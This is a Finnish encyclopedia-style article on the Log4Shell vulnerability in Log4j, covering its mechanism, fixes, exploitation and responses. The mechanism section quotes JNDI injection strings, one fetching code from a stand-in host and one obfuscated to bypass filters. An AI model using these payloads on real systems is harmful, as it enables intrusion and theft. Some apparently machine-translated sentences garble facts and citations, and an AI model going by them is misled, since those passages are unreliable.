Log4Shell

Kokeneet kirjoittajat eivät ole vielä tarkistaneet sivun nykyistä versiota, ja se voi poiketa merkittävästi 12.5.2022 tarkistetusta versiosta . tarkastukset vaativat 3 muokkausta .

Log4Shell ( CVE-2021-44228 ) on nollapäivän haavoittuvuus Log4j:ssä , suositussa Java-lokikehyksessä, joka sisältää mielivaltaisen koodin suorittamisen. [1] [2] Haavoittuvuuden – sen olemassaoloa ei ole nähty vuoden 2013 jälkeen – julkisti yksityisesti Apache Software Foundation , jonka projekti Log4j on, Chen Zhaojun Alibaba Cloud -tietoturvatiimistä 24. marraskuuta 2021 ja julkisesti. julkistettu 9.12.2021. [3] [4] [5] [6] Apache antoi Log4Shellille CVSS:n vakavuuspisteen 10, korkeimman saatavilla olevan arvosanan. [7]Hyödyntämisen arvioidaan vaikuttavan satoihin miljooniin laitteisiin, ja se on erittäin helppokäyttöinen. [8] [9]

Haavoittuvuus hyödyntää sitä tosiasiaa, että Log4j sallii pyynnöt mielivaltaisille LDAP- ja JNDI -palvelimille vastausten vahvistamisen sijaan [1] [10] [11] , jolloin hyökkääjät voivat suorittaa mielivaltaisen Java-koodin palvelimella tai muulla koneella tai lähettää arkaluonteisia tietoja. [5] Apache Security Group on julkaissut luettelon ohjelmistoprojekteista, joihin tämä vaikuttaa. [12] Kaupallisiin palveluihin kuuluvat Amazon Web Services , [13] Cloudflare , iCloud , [14] Minecraft: Java Edition , [15] Steam , Tencent QQ ja monet muut. [10] [16] [17] Wizin ja EY :n mukaan haavoittuvuus vaikutti 93 %:iin yritysten pilviympäristöistä. [kahdeksantoista]

Asiantuntijat kuvasivat Log4Shellin kaikkien aikojen suurimmaksi haavoittuvuudeksi; [19] LunaSec kuvaili sitä "katastrofaalisten mittasuhteiden suunnitteluvirheeksi", [5] Tenable sanoi, että hyväksikäyttö oli "historian suurin ja kriittisin haavoittuvuus", [20] Ars Technica kutsui sitä "epäilemättä vakavimmaksi haavoittuvuudeksi koskaan". . [21] ja The Washington Post sanoivat, että turvallisuusasiantuntijoiden kuvaukset "rajoittuvat apokalypsiin". [19]

Tausta

Log4j on avoimen lähdekoodin lokikirjasto , jonka avulla ohjelmistokehittäjät voivat kirjata tietoja sovelluksissaan. Nämä tiedot voivat sisältää käyttäjän syötteitä. [22] Se on kaikkialla Java-sovelluksissa, erityisesti yritysohjelmistoissa. [5] Sen kirjoitti alun perin Cheki Gulcu vuonna 2001, mutta se on nyt osa Apache Logging Services -projektia, Apache Software Foundationin projektia . [23] Presidentti Barack Obaman kyberturvallisuuskomission entinen jäsen Tom Kellermann kuvaili Apachea "yhdeksi sillan jättimäisistä pilareista, joka helpottaa sidekudosta sovellusmaailmojen ja laskentaympäristön välillä." [24]

Käyttäytyminen

Java - nimeämis- ja hakemistoliittymän (JNDI) avulla voit etsiä Java-objekteja ajon aikana niiden tietojen polun perusteella. JNDI voi käyttää useita hakemistorajapintoja, joista jokainen tarjoaa erilaisen tiedostohakumallin. Näihin liitäntöihin kuuluu LDAP ( Lightweight Directory Access Protocol ), ei-Java-protokolla [25] , joka hakee objektidataa URL-osoitteen muodossa sopivalta palvelimelta, paikalliselta tai muulta Internetissä. [26]

Oletuskokoonpanossa, kun merkkijono kirjataan lokiin, Log4j 2 suorittaa merkkijonojen korvaamisen muodon lausekkeissa ${prefix:name}. [26] Voit esimerkiksi Text: ${java:version}muuntaa muotoon Text: Java version 1.7.0_67. [27] Tunnistettujen ilmaisujen joukossa ovat ${jndi:<lookup>} ; määrittämällä haun LDAP:n kautta, mielivaltainen URL voidaan kysyä ja ladata Java-objektitietona. ${jndi:ldap://example.com/file}lataa tiedot tästä URL-osoitteesta, kun se on yhteydessä Internetiin. Kirjoittamalla lokiin kirjatun merkkijonon hyökkääjä voi ladata ja suorittaa julkisessa URL-osoitteessa isännöidyn haitallisen koodin. [26] Vaikka tietojen suoritus olisi estetty, hyökkääjä voi hankkia tietoja, kuten salaisia ​​ympäristömuuttujia, sijoittamalla ne URL-osoitteeseen, jossa ne korvataan ja lähetetään hyökkääjän palvelimelle. [28] [29] LDAP:n lisäksi muita mahdollisesti hyödyllisiä JNDI-hakuprotokollia ovat sen suojattu muunnelma LDAPS, Java Remote Method Invocation (RMI), Domain Name System (DNS) ja Internet Inter-ORB Protocol (IIOP). [30] [31]

Koska HTTP -pyynnöt kirjataan usein lokiin, yleinen hyökkäysvektori on haitallisen merkkijonon sijoittaminen HTTP-pyynnön URL-osoitteeseen tai usein kirjattavaan HTTP-otsikkoon , kuten User-Agent. Varhaisiin suojauksiin kuului kaikkien mahdollisesti haitallista sisältöä sisältävien pyyntöjen estäminen, kuten ${jndi. [32] Naiivi haku voidaan ohittaa hämärtämällä kysely: esimerkiksi ${${lower:j}ndise muunnetaan JNDI-hauksi, kun kirjaimelle on suoritettu merkkijonotoiminto j. [33] Vaikka syötettä, kuten nimeä, ei heti kirjata lokiin, se voidaan myöhemmin tallentaa sisäisen käsittelyn aikana ja sen sisältö voidaan suorittaa. [26]

Korjaukset

Tämän haavoittuvuuden korjaukset julkaistiin 6. joulukuuta 2021, kolme päivää ennen haavoittuvuuden julkaisemista, Log4j:n versiossa 2.15.0-rc1. [34] [35] [36] Korjaus sisälsi hauissa käytettävien palvelimien ja protokollien rajoittamisen. Tutkijat löysivät asiaan liittyvän virheen CVE-2021-45046, joka sallii paikallisen tai etäkoodin suorittamisen tietyissä ei-oletuskokoonpanoissa, ja se korjattiin versiossa 2.16.0, joka poisti käytöstä kaikki JNDI:tä ja viestien hakutukea käyttävät ominaisuudet. [37] [38] Aiemmissa versioissa luokka org.apache.logging.log4j.core.lookup. JndiLookupon poistettava luokkapolulta molempien haavoittuvuuksien vähentämiseksi. [7] [37] Aiemmin suositeltu korjaus vanhemmille versioille oli asettaa järjestelmän ominaisuuden log4j2.formatMsgNoLookups truearvoksi , mutta tämä muutos ei estä CVE-2021-45046:n käyttöä. [37]

Java Runtime Environmentin (JRE) uudemmat versiot myös vähentävät tätä haavoittuvuutta estämällä oletusarvoisesti koodin etälatauksen, vaikka joissakin sovelluksissa on edelleen muita hyökkäysvektoreita. [1] [28] [39] [40] On julkaistu useita menetelmiä ja työkaluja, jotka auttavat havaitsemaan log4j:n haavoittuvien versioiden käytön sulautetuissa Java-paketeissa. [41]

Käyttö

Hyökkäys antaa hakkereille mahdollisuuden ottaa haavoittuvia laitteita hallintaansa Javalla . [8] Jotkut hakkerit käyttävät haavoittuvuutta hyödyntääkseen uhrien laitteita; mukaan lukien kryptovaluutan louhinta , bottiverkkojen luominen , roskapostin lähettäminen, takaovien luominen ja muu laiton toiminta, kuten kiristysohjelmahyökkäykset. [8] [19] [42] Haavoittuvuuden julkaisua seuraavina päivinä Check Point seurasi miljoonia hakkereiden käynnistämiä hyökkäyksiä, ja jotkut tutkijat havaitsivat yli sata hyökkäystä minuutissa, mikä johti lopulta yli 40 prosenttiin hyökkäyksistä. kansainvälisten hyökkäysten kohteena olevat yritysverkot. [8] [24]

Cloudflaren toimitusjohtajan Matthew Princen mukaan todisteita hyväksikäytöstä tai testauksesta ilmaantui jo 1. joulukuuta, yhdeksän päivää ennen kuin se julkistettiin. [43] Kyberturvallisuusyrityksen GreyNoisen mukaan verkkosivustot  ovat kaavineet useita IP - osoitteita etsiäkseen haavoittuvuuden sisältäviä palvelimia. [44] Useat bottiverkot aloittivat haavoittuvuuden etsimisen, mukaan lukien Muhstik-botnet 10. joulukuuta mennessä sekä Mirai , Tsunami ja XMRig. [8] [43] [45] Contin nähtiin hyödyntävän haavoittuvuutta 17. joulukuuta. [19]

Check Pointin mukaan myös jotkut valtion tukemat ryhmät Kiinassa ja Iranissa käyttivät hyväksikäyttöä, vaikka ei tiedetä, käyttikö hyväksikäyttö Israel, Venäjä vai Yhdysvallat ennen haavoittuvuuden paljastamista. [19] [46] Check Point totesi, että 15. joulukuuta 2021 Iranin tukemat hakkerit yrittivät soluttautua israelilaisiin yrityksiin ja hallituksen verkostoihin. [19]

Vastaa ja vaikuta

Hallitus

Yhdysvalloissa Cybersecurity and Infrastructure Security Agencyn (CISA) johtaja Jen Easterly kuvaili hyväksikäyttöä "yhdeksi vakavimmista, ellei vakavimmista, mitä olen nähnyt koko urani aikana", ja selitti, että se vaikutti satoihin miljooniin laitteisiin. ja suositteli, että myyjät maksavat etusijalle ohjelmistopäivitykset. [8] [47] [48] Yhdysvaltain hallituksen palkkaamilla siviilivirastoilla oli 24. joulukuuta 2021 asti aikaa korjata haavoittuvuudet, vaikka siihen mennessä se olisi mahdollistanut pääsyn satoihin tuhansiin kohteisiin. [19]

Canadian Center for Cyber ​​​​Security (CCCS) kehotti organisaatioita ryhtymään välittömiin toimiin. [49] Kanadan verovirasto poisti tilapäisesti verkkopalvelunsa käytöstä saatuaan tiedon hyväksikäytöstä, kun taas Quebecin hallitus sulki lähes 4 000 verkkosivustoaan "ennaltaehkäisevänä toimenpiteenä". [viisikymmentä]

Saksan liittovaltion turvallisuusvirasto ( Bundesamt für Sicherheit in der Informationstechnik) (BSI) on tunnistanut hyväksikäytön olevan korkeimmalla uhkatasolla ja kutsunut sitä "erittäin kriittiseksi vaaralliseksi tilanteeksi" (käännetty). Hän sanoi myös, että useat hyökkäykset ovat jo onnistuneet ja haavoittuvuuden laajuutta on edelleen vaikea arvioida. [51] [52] Hollannin kansallinen kyberturvallisuuskeskus (NCSC) on aloittanut pysyvän luettelon haavoittuvista sovelluksista. [53] [54]

Kiinan teollisuus- ja tietotekniikkaministeriö on keskeyttänyt Alibaba Cloudin kyberturvallisuusuhkien analysointikumppanin kuuden kuukauden ajaksi, koska se ei ole ilmoittanut haavoittuvuudesta ensin hallitukselle. [55]

Yritykset

Wizin ja EY :n tutkimuksessa [18] havaittiin, että 93 % pilviyritysympäristöstä oli haavoittuvainen Log4Shellille. 7 % haavoittuvista työkuormista on saatavilla verkossa, ja niitä yritetään hyödyntää laajasti. Tutkimuksen mukaan kymmenen päivää haavoittuvuuden julkaisemisen jälkeen (20.12.2021) vain 45 % haavoittuvista työkuormista korjattiin pilviympäristöissä. Log4Shell on vaikuttanut Amazonin, Googlen ja Microsoftin pilvitietoihin. [19]

HR- ja HR-yritys UKG, yksi alan suurimmista yrityksistä, on kärsinyt suuriin yrityksiin kohdistuvasta kiristysohjelmahyökkäyksestä . [21] [56] UKG ilmoitti, ettei sillä ollut todisteita Log4Shellin käyttämisestä tapahtumassa, vaikka kyberturvallisuusyhtiö Recorded Future -nalyytikko Allan Liska sanoi, että yhteys saattaa olla olemassa. [57]

Kun suuret yritykset alkoivat julkaista korjaustiedostoja hyväksikäyttöä varten, riski pienille yrityksille kasvoi, kun hakkerit keskittyivät haavoittuvampiin kohteisiin. [42]

Yksityisyys

Henkilökohtaiset laitteet, kuten älytelevisiot ja Internetiin kytketyt valvontakamerat, olivat alttiina hyväksikäytölle. [19]

Analyysi

14.12.2021 mennessä lähes puolet maailman kaikista yritysverkoista oli aktiivisesti tutkittu ja päivässä luotiin yli 60 hyödyntämisvarianttia. [58] Check Point Software Technologies kuvaili yksityiskohtaisessa analyysissä tilannetta "todelliseksi kyberpandemiaksi" ja kuvaili mahdollisia vahinkoja "arvaamattomiksi". [59] Useat alkuperäiset suositukset yliarvioivat haavoittuvien pakettien määrän, mikä johti vääriin positiivisiin tuloksiin. Erityisesti "log4j api" -paketti merkittiin haavoittuvaiseksi, kun taas itse asiassa lisätutkimukset osoittivat, että vain pääpaketti "log4j-core" oli haavoittuvainen.

Tämä on vahvistettu sekä alkuperäisessä julkaisuhaarassa [60] että ulkopuolisten tietoturvatutkijoiden toimesta.

Teknologialehti Wired kirjoitti, että huolimatta aiemmasta "hype'stä", joka ympäröi lukuisia haavoittuvuuksia, "Log4j-haavoittuvuutta ympäröivä hype... on perusteltua useista syistä." [46] Lehti selittää, että log4j:n yleisyys, jonka haavoittuvuutta mahdollisten kohteiden on vaikea havaita, ja helppous, jolla koodi voidaan siirtää uhrin koneelle, loi "vakavuuden, saavutettavuuden ja yleisyyden yhdistelmän, joka järkytti tietoturva-ammattilaisia. ." [46] Wired esitteli myös kaavamaisesti hakkereiden Log4Shellin käytön: kryptovaluuttojen louhintaryhmät hyödyntävät haavoittuvuutta ensimmäisenä, sitten datakauppiaat myyvät "sillanpään" kyberrikollisille, jotka vihdoin ryhtyvät kiristykseen, vakoiluun ja tietojen tuhoamiseen . . [46]

Amit Göran, Tenablen toimitusjohtaja ja US Computer Emergency Preparedness Groupin perustajajohtaja , totesi, että "[Log4Shell] on ylivoimaisesti suurin ja kriittisin haavoittuvuus historiassa", huomautti, että kehittyneet hyökkäykset alkoivat pian virheen jälkeen, ja totesi: "Me myös on jo nähty, että sitä käytetään kiristysohjelmahyökkäyksiin, minkä pitäisi jälleen olla suuri herätys... Olemme myös nähneet raportteja hyökkääjistä, jotka käyttävät Log4Shellia tuhotakseen järjestelmiä edes yrittämättä saada lunnaita - melko epätavallista käytöstä." . [46] Sophosin vanhempi uhkatutkija Sean Gallagher sanoi: "Ollakseni rehellinen, suurin uhka tässä on se, että ihmiset ovat jo saaneet pääsyn ja käyttävät sitä vain, ja vaikka korjaatkin ongelman, joku on jo verkossa... olemassa niin kauan kuin Internet." [kaksikymmentä]

Muistiinpanot

  1. 123 Wortley . _ Log4Shell: RCE 0-päivän hyväksikäyttö löytyy log4j 2:sta, suositusta Java- lokipaketista . LunaSec (9. joulukuuta 2021). Haettu 12. joulukuuta 2021. Arkistoitu alkuperäisestä 25. joulukuuta 2021.  
  2. CVE-2021-44228 . Yleiset haavoittuvuudet ja altistukset . Haettu 12. joulukuuta 2021. Arkistoitu alkuperäisestä 25. joulukuuta 2021.
  3. Povolny. Log4Shell-haavoittuvuus on varastomme kivihiili vuodelle  2021 . McAfee (10. joulukuuta 2021). Haettu 12. joulukuuta 2021. Arkistoitu alkuperäisestä 24. joulukuuta 2021.
  4. Huonoin Apache Log4j RCE Zero day dropped on Internet . Cyber ​​​​Kendra (9. joulukuuta 2021). Haettu 12. joulukuuta 2021. Arkistoitu alkuperäisestä 24. joulukuuta 2021.
  5. 1 2 3 4 Newman . "Internet on tulessa"  (eng.) , langallinen  (10. joulukuuta 2021). Arkistoitu alkuperäisestä 24. joulukuuta 2021. Haettu 12.12.2021.
  6. Murphy . Hakkerit käynnistävät yli 1,2 miljoonaa hyökkäystä Log4J-virheen kautta , Financial Times  (14.12.2021). Arkistoitu alkuperäisestä 17. joulukuuta 2021. Haettu 17.12.2021.
  7. 1 2 Apache Log4j -tietoturvahaavoittuvuudet . Log4j . Apache Software Foundation. Haettu 12. joulukuuta 2021. Arkistoitu alkuperäisestä 26. joulukuuta 2021.
  8. 1 2 3 4 5 6 Murphy, Hannah . Hakkerit käynnistävät yli 1,2 miljoonaa hyökkäystä Log4J-virheen kautta , Financial Times  (14.12.2021). Arkistoitu alkuperäisestä 21. joulukuuta 2021. Haettu 25.12.2021.
  9. Metsästäjä. Kaikkien aikojen "vakavin" tietoturvaloukkaus on paljastunut juuri nyt. Tässä on mitä sinun on tiedettävä. . The Washington Post (20. joulukuuta 2021). Haettu 25. joulukuuta 2021. Arkistoitu alkuperäisestä 27. joulukuuta 2021.
  10. 12 Mott . Lukemattomat palvelimet ovat alttiina Apache Log4j Zero-Day Exploitille . PC Magazine (10. joulukuuta 2021). Haettu 12. joulukuuta 2021. Arkistoitu alkuperäisestä 24. joulukuuta 2021.  
  11. Hyvä. Nollapäivä kaikkialla läsnä olevassa Log4j-työkalussa on vakava uhka   Internetille ? . Ars Technica (10.12.2021). Haettu 12. joulukuuta 2021. Arkistoitu alkuperäisestä 23. joulukuuta 2021.
  12. Apache-projektit, joihin log4j CVE-2021-44228 vaikuttaa (14.12.2021). Haettu 25. joulukuuta 2021. Arkistoitu alkuperäisestä 17. joulukuuta 2021.
  13. Päivitys Apache Log4j2 -ongelmalle (CVE-2021-44228) . Amazon Web Services (12. joulukuuta 2021). Haettu 13. joulukuuta 2021. Arkistoitu alkuperäisestä 28. joulukuuta 2021.
  14. Lovejoy. Apple korjaa Log4Shell iCloudin haavoittuvuuden, jota on kuvattu kriittisimmäksi vuosikymmeneen . 9to5mac (14. joulukuuta 2021). Haettu 25. joulukuuta 2021. Arkistoitu alkuperäisestä 23. joulukuuta 2021.
  15. Minecraftin tietoturvahaavoittuvuus: Java Edition . Minecraft . Mojang Studios . Haettu 13. joulukuuta 2021. Arkistoitu alkuperäisestä 24. joulukuuta 2021.
  16. Hyvä. Kriittinen Log4Shell 0-day vaikuttaa kaikkiin Internetin suuriin pelaajiin . ArsTechnica (10. joulukuuta 2021). Haettu 13. joulukuuta 2021. Arkistoitu alkuperäisestä 25. joulukuuta 2021.
  17. Rundle. Mikä on Log4j-haavoittuvuus? (15. joulukuuta 2021). Haettu 25. joulukuuta 2021. Arkistoitu alkuperäisestä 25. joulukuuta 2021.
  18. ↑ 1 2 Yritykset Log4Shell | -korjauksen puolivälissä wiz-blogi . www.wiz.io. _ Haettu 20. joulukuuta 2021. Arkistoitu alkuperäisestä 20. joulukuuta 2021.
  19. 1 2 3 4 5 6 7 8 9 Hunter, Tatum; de Vynck, Gerrit Kaikkien aikojen "vakavin" tietoturvaloukkaus on paljastunut juuri nyt. Tässä on mitä sinun on tiedettävä. . The Washington Post (20. joulukuuta 2021). Haettu 25. joulukuuta 2021. Arkistoitu alkuperäisestä 27. joulukuuta 2021.
  20. ↑ 12 Barrett . _ Log4J-hyökkäysten seuraava aalto tulee olemaan brutaali (englanniksi) , langallinen . Arkistoitu alkuperäisestä 17. joulukuuta 2021. Haettu 17.12.2021. 
  21. ↑ 12 Goodin . Kun Log4Shell aiheuttaa tuhoa, palkkapalvelu raportoi   lunnasohjelmahyökkäyksestä ? . Ars Technica (13.12.2021). Haettu 17. joulukuuta 2021. Arkistoitu alkuperäisestä 17. joulukuuta 2021.
  22. Yan. Toista Apache Log4j -haavoittuvuutta hyödynnetään aktiivisesti luonnossa (CVE-2021-44228) . Yksikkö 42 . Palo Alto Networks (10.12.2021). Haettu 25. joulukuuta 2021. Arkistoitu alkuperäisestä 24. joulukuuta 2021.
  23. Apache Log4j 2 . Apache Software Foundation. Haettu 12. joulukuuta 2021. Arkistoitu alkuperäisestä 14. joulukuuta 2021.
  24. ↑ 1 2 Byrnes. Hillicon Valley - Apache - haavoittuvuus laukaisee  hälytyskelloja . The Hill (14.12.2021). Haettu 17. joulukuuta 2021. Arkistoitu alkuperäisestä 17. joulukuuta 2021.
  25. "" . RFC rfc4511.
  26. 1 2 3 4 Graham-Cumming. Log4j2-haavoittuvuuden sisällä (CVE-2021-44228  ) . Cloudflare-blogi (10. joulukuuta 2021). Haettu 13. joulukuuta 2021. Arkistoitu alkuperäisestä 22. joulukuuta 2021.
  27. Haut . Log4j . Apache Software Foundation. Haettu 13. joulukuuta 2021. Arkistoitu alkuperäisestä 25. joulukuuta 2021.
  28. 12 Ducklin . Log4Shell selitti – miten se toimii, miksi sinun on tiedettävä ja kuinka korjata se . Alaston turvallisuus . Sophos (12. joulukuuta 2021). Haettu 12. joulukuuta 2021. Arkistoitu alkuperäisestä 26. joulukuuta 2021.
  29. Miessler. Log4j (Log4Shell) -tilanne . Ohjaamaton oppiminen (13.12.2021). Haettu 25. joulukuuta 2021. Arkistoitu alkuperäisestä 13. joulukuuta 2021.
  30. Duraishamy. Korjaus nyt Apache Log4j - haavoittuvuus nimeltä Log4Shell on aktiivisesti hyväksikäytetty . Trend Micro (13.12.2021). Haettu 14. joulukuuta 2021. Arkistoitu alkuperäisestä 20. joulukuuta 2021.
  31. Narang. CVE-2021-44228: Krittisen Apache Log4j:n koodin etäsuorittamisen haavoittuvuus saatavilla (Log4Shell) . Kestävä blogi (10.12.2021). Haettu 14. joulukuuta 2021. Arkistoitu alkuperäisestä 20. joulukuuta 2021.
  32. Gabor. CVE-2021-44228 - Log4j RCE 0 päivän lievennys . Cloudflare-blogi (10. joulukuuta 2021). Haettu 13. joulukuuta 2021. Arkistoitu alkuperäisestä 23. joulukuuta 2021.
  33. Hahad. Apache Log4j -haavoittuvuus CVE-2021-44228 herättää laajaa huolta (12. joulukuuta 2021). Haettu 12. joulukuuta 2021. Arkistoitu alkuperäisestä 13. joulukuuta 2021.
  34. ↑ Rajoita rgoers #608  LDAP-käyttöä JNDI : n kautta . Log4j (5. joulukuuta 2021). Haettu 12. joulukuuta 2021. Arkistoitu alkuperäisestä 30. joulukuuta 2021.
  35. Berger. Mikä on Log4Shell? Log4j-haavoittuvuus selitti (ja mitä tehdä sille) . Dynatracen uutiset (17.12.2021). Apache julkaisi korjaustiedoston CVE-2021-44228, versio 2.15, 6. joulukuuta. Tämä korjaustiedosto jätti kuitenkin osan haavoittuvuudesta korjaamatta, mikä johti CVE-2021-45046 ja toinen korjaustiedosto, versio 2.16, joka julkaistiin 13. joulukuuta. Apache julkaisi. kolmas korjaustiedosto, versio 2.17, 17. joulukuuta korjaamaan toinen tähän liittyvä haavoittuvuus, CVE-2021-45105." Haettu 25. joulukuuta 2021. Arkistoitu alkuperäisestä 21. joulukuuta 2021.
  36. Rudis. Apache Log4j |:n kriittisen etäkoodin suorittamisen laajalle levinnyt hyödyntäminen  Rapid7 blogi . Rapid7 (10. joulukuuta 2021). Haettu 25. joulukuuta 2021. Arkistoitu alkuperäisestä 21. joulukuuta 2021.
  37. 123 CVE - 2021-45046 . Yleiset haavoittuvuudet ja altistukset (15.12.2021). Haettu 15. joulukuuta 2021. Arkistoitu alkuperäisestä 25. joulukuuta 2021.
  38. Greig. Toinen Log4j-haavoittuvuus löydetty, korjaustiedosto on jo  julkaistu . ZDNet (14. joulukuuta 2021). Haettu 17. joulukuuta 2021. Arkistoitu alkuperäisestä 27. joulukuuta 2021.
  39. Java(TM) SE Development Kit 8, päivitys 121 (JDK 8u121)  julkaisutiedot . Oracle (17. tammikuuta 2017). Haettu 13. joulukuuta 2021. Arkistoitu alkuperäisestä 19. joulukuuta 2021.
  40. JNDI-injektioiden hyödyntäminen Javassa . Veracode (3. tammikuuta 2019). Haettu 15. joulukuuta 2021. Arkistoitu alkuperäisestä 15. joulukuuta 2021.
  41. Opas: Log4Shell-haavoittuvuuden havaitseminen ja vähentäminen (CVE-2021-44228  ) . www.lunasec.io (13. joulukuuta 2021). Haettu 13. joulukuuta 2021. Arkistoitu alkuperäisestä 24. joulukuuta 2021.
  42. ↑ 12 Puutarha .  "Kriittinen haavoittuvuus " : Pienemmillä yrityksillä voi olla vaikeampaa estää hakkereita hyödyntämästä Log4j-virhettä  ? . USA Tänään . Käyttöönottopäivä: 17.12.2021.
  43. 12 Duckett . Log4j RCE - toiminta alkoi 1. joulukuuta , kun botnetit alkavat käyttää  haavoittuvuutta . ZDNet . Haettu 13. joulukuuta 2021. Arkistoitu alkuperäisestä 22. joulukuuta 2021.
  44. Apache Log4j -haavoittuvuuden hyväksikäyttö - CVE-2021-44228 . Greynoise Research (10. joulukuuta 2021). Haettu 14. joulukuuta 2021. Arkistoitu alkuperäisestä 20. joulukuuta 2021.
  45. Zugec. Tekninen neuvonta: Log4j2:n nollapäivän kriittinen haavoittuvuus, jota hyödynnetään luonnossa . liiketoiminnan oivalluksia . Bitdefender (13. joulukuuta 2021). Haettu 25. joulukuuta 2021. Arkistoitu alkuperäisestä 15. joulukuuta 2021.
  46. 1 2 3 4 5 Barrett, Brian . Log4J-hyökkäysten seuraava aalto tulee olemaan brutaali  (englanniksi) , langallinen . Arkistoitu alkuperäisestä 27. joulukuuta 2021. Haettu 25.12.2021.
  47. CISA-johtaja Easterlyn lausunto "Log4j"-haavoittuvuudesta . CISA (11. joulukuuta 2021). Haettu 25. joulukuuta 2021. Arkistoitu alkuperäisestä 27. joulukuuta 2021.
  48. Woodyard, Chris "Kriittinen haavoittuvuus  " : Pienemmillä yrityksillä voi olla vaikeampaa estää hakkereita hyödyntämästä Log4j-virhettä  ? . USA Tänään . Käyttöönottopäivä: 17.12.2021.
  49. Maanpuolustusministerin lausunto Apache-haavoittuvuudesta ja kehotus kanadalaisille järjestöille ryhtyä kiireellisiin  toimiin . Kanadan hallitus (12. joulukuuta 2021). Haettu 25. joulukuuta 2021. Arkistoitu alkuperäisestä 20. joulukuuta 2021.
  50. Cabrera . Kyberturvallisuusuhkien vuoksi Quebec sulkee hallituksen verkkosivustot arvioitavaksi , CBC News  (12. joulukuuta 2021). Arkistoitu alkuperäisestä 20. joulukuuta 2021. Haettu 12.12.2021.
  51. Sauerwein. BSI warnt vor Sicherheitslücke  (saksa) . Tagesschau (12. joulukuuta 2021). Haettu 25. joulukuuta 2021. Arkistoitu alkuperäisestä 5. tammikuuta 2022.
  52. (11. joulukuuta 2021). Warnstufe Rot: Schwachstelle Log4Shell führt zu extrem kritischer Bedrohungslage (in de). Lehdistötiedote . Arkistoitu alkuperäisestä 13. joulukuuta 2021. Haettu 25.12.2021 .
  53. J. Vaughan-Nichols. Log4Shell: Olemme niin paljon vaikeuksissa . The New Stack (14.12.2021). Haettu 25. joulukuuta 2021. Arkistoitu alkuperäisestä 23. joulukuuta 2021.
  54. NCSC-NL/log4shell . National Cyber ​​​​Security Center (Alankomaat). Haettu 14. joulukuuta 2021. Arkistoitu alkuperäisestä 29. joulukuuta 2021.
  55. Apache Log4j -virhe: Kiinan teollisuusministeriö hakee tukea Alibaba Cloudilta, koska se ei raportoinut virheestä ensin hallitukselle . Haettu 25. joulukuuta 2021. Arkistoitu alkuperäisestä 25. joulukuuta 2021.
  56. Bray. Uusi Log4j-ohjelmistovirhe aiheuttaa maailmanlaajuista huolta kyberhyökkäyksistä - The Boston   Globe ? . Boston Globe (15. joulukuuta 2021). Haettu 17. joulukuuta 2021. Arkistoitu alkuperäisestä 17. joulukuuta 2021.
  57. Bray, Hiawatha Kehittyvät 'Log4j'-ohjelmistovirheet aiheuttavat maailmanlaajuista huolta kyberhyökkäyksistä - The Boston   Globe ? . Boston Globe (15. joulukuuta 2021). Haettu 17. joulukuuta 2021. Arkistoitu alkuperäisestä 17. joulukuuta 2021.
  58. Lähes puolet verkoista tutki Log4Shellin heikkouksia . ComputerWeekly (14.12.2021). Haettu 25. joulukuuta 2021. Arkistoitu alkuperäisestä 20. joulukuuta 2021.
  59. Kyberpandemian taustalla olevat numerot – yksityiskohtainen sukellus . Check Point -ohjelmisto (13. joulukuuta 2021). Haettu 25. joulukuuta 2021. Arkistoitu alkuperäisestä 24. joulukuuta 2021.
  60. LOG4J2-3201: Rajoita JNDI:n käyttämiä protokollia ja rajoita LDAP:ta. . Apachen JIRA-ongelmien seurantalaite . Haettu 14. joulukuuta 2021. Arkistoitu alkuperäisestä 25. joulukuuta 2021.